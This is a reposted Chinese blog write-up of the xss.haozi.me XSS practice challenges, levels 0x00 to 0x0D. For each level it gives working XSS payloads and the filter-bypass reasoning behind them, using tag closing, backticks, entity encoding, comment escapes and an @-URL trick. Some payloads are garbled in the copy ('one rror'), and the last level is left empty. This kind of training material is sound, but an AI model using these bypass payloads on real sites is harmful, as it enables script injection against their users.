标签:练习题 XSS -- 过滤 闭合 alert 解题 思路
简单的记录一下自己XSS的练习。
题目网址:https://xss.haozi.me/#/0x00
0x00
<script>alert(1)</script>
<img src="任意图片名" one rror="alert(1)">
解题思路:没什么技术含量,一个基本的XSS。这里也可以利用资源报错来弹窗。
0x01
</textarea><script>alert(1)</script>
</textarea><img src="任意图片名" one rror="alert(1)">
解题思路:这里主要是要将默认返回的标签先闭合再插入XSS代码。(后半部分闭不闭合皆可)。
0x02
"><script>alert(1)</script>
"><img src="任意图片名" one rror="alert(1)">
解题思路:同样是闭合题中所给的标签。
0x03
<script>alert`1`</script>
<img src="任意图片名" one rror="alert`1`">
解题思路:题目中有对括号的过滤,这里考虑使用反撇号来代替括号起到相同的效果。
0x04
<img src="任意图片名" one rror="alert(1)">
<img src="任意图片名" one rror="alert`1`">
解题思路:题目将反撇号也过滤掉了,所以考虑用HTML实体编码来进行绕过。
其中上面一行为左右括号,下面一行为反撇号。
0x05
--!><img src="任意图片名" one rror="alert(1)">
解题思路:题目将用于闭合注释的-->过滤掉了,用--!>来闭合即可。
0x06
type="image" src="1" one rror
="alert(1)"
解题思路:在input标签中添加一个图片类型,然后依然利用资源报错(注意换行的位置)
0x07
<img src="1" one rror="alert(1)"
解题思路:这个是过滤了所有以 /</?[^>]开头 和 > 结尾的字符,所以最后面不加>就好了。
0x08
</style
><script>alert(1)</script>
解题思路:这个是过滤了标签导致无法闭合,所以用换行或者空格将它分开以绕过。
0x09
https://www.segmentfault.com"></script><img src="1" one rror="alert(1)">
解题思路:这里限制了URL,其余的按正常套路闭合即可。
0x0A
https://www.segmentfault.com@xss.haozi.me/j.js
解题思路:这个用到了@,在URL中会解析@后面的网址,如果你的没弹出来试试换个浏览器,我的用火狐就可以了。
0x0B
<img src="1" one rror="alert(1)">
解题思路:这个题将所有的字母都换成了大写,所以要将alert(1)进行HTML实体字符转换。
0x0C
<img src="1" one rror="alert(1)">
解题思路:这里过滤了script标签,继续使用资源报错的方式弹窗即可。
0x0D
alert(1)
-->
解题思路:这个是将输入内容带入到了注释中,可以用换行逃逸。由于过滤了单引号',所以后面的')可以用-->注释掉。
0x0E
解题思路:
标签:练习题,XSS,--,过滤,闭合,alert,解题,思路 来源: https://www.cnblogs.com/Severus-Cavendish/p/15456260.html
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。